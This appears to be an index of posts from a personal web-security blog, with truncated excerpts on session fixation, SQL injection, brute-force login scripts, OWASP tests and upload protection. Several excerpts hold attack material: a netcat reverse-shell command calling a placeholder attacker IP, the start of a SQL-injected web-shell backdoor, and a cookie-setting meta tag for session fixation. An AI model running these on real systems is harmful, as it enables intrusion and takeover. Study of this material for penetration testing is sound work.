Set cookie by meta tag
<meta http-equiv="Set-Cookie" content="_session_id=0123456789; EXPIRES=Monday, 22-FEB-20 01:00:00 GMT; DOMAIN=localhost; PATH=/;" />
Session fixation
https://www.youtube.com/watch?v=4gVSEU92xI4 https://www.youtube.com/watch?v=Eu70WqFBt2I https://www.owasp.org/index.php/Session_fixation https://www.youtube.com/watch?v=eUbtW0Z0W1g
Account lockout
https://www.youtube.com/watch?v=hweQ5oW6ImA https://www.youtube.com/watch?v=oVH0h14qG1k#t=176.742441
#note – SQL Injection Cheat Sheet
http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet
Protect FileUpload Against Malicious File
Problem: Very often during file validation we check the extension and size of the file. We want to be sure that the user will not be able to upload an executable file (php, exe and others). On the other hand we...
#note – python version
http://askubuntu.com/questions/320996/make-default-python-symbolic-link-to-link-to-python3
Review webpage comments
https://www.owasp.org/index.php/Review_webpage_comments_and_metadata_for_information_leakage_(OTG-INFO-005) It is very common, and even recommended, for programmers to include detailed comments and...
Sql injection – upload backdoor- mysql
-- conditions -- we know the application directory -- we know sql injection vulnerability in the app SELECT _utf8 '<form method="post"><input name="cmd"/><input type="button"...
Brute Force Login Attacks
simple python script # python 3.4 import urllib.request import urllib.parse loginFilePath = "login.txt" passFilePath = "pass.txt" # passFilePath = "../../_data/_pass/john.txt" # passFilePath =...
Test HTTP Methods
https://www.owasp.org/index.php/Test_HTTP_Methods_(OTG-CONFIG-006) # python 3.4 import urllib.request import urllib.parse http_methods = ['HEAD', 'GET', 'POST', 'OPTIONS', 'TRACE'] page_url =...
Test RIA cross domain policy
https://www.owasp.org/index.php/Test_RIA_cross_domain_policy_(OTG-CONFIG-008) # python 3.4 import urllib.request import urllib.parse ria_meta_file = ['crossdomain.xml', 'clientaccesspolicy.xml']...
Pre-engagement Pentest Checklist for Web Applications Assessments
Based on https://pentestlab.blog/2015/02/01/pre-engagement-pentest-checklist-for-web-applications-assessments/ http://www.pentest-standard.org/index.php/Pre-engagement Pre-engagement Pentest Checklist...
Custom dictionary file based on the content of the website
This script will generate a file with unique words from the target website. url.txt http://company-test.com/about-as http://company-test.com/company http://company-test.com/stuff tool.py # python 3.4 import...
Command Execution
On attacker machine sudo nc -vv -l -p 8081 Listening on [0.0.0.0] (family 0, port 8081) On victim machine nc -e /bin/sh IP_OF_ATTACKER_IP 8081 now check attacker machine if you see something like...
Ubuntu postgresql from scratch
Ubuntu 14 postgresql installation sudo apt-get update sudo apt-get install postgresql postgresql-contrib Go to console sudo -i -u postgres psql Example db with one table CREATE DATABASE btbw; \connect...
Hex url coder
not perfect, draft import binascii def hex_url(_url): protocol = '' filter = ['?', '=', "/"] if _url.startswith('http://'): protocol = 'http://' _url = _url.replace(protocol, "") if...
Two step registration. Problem with username and enumeration.
Problem: If, during registration, the system validates that the username is unique and reports this through some type of validation message, you can treat this as a data leak. A potential attacker can use this...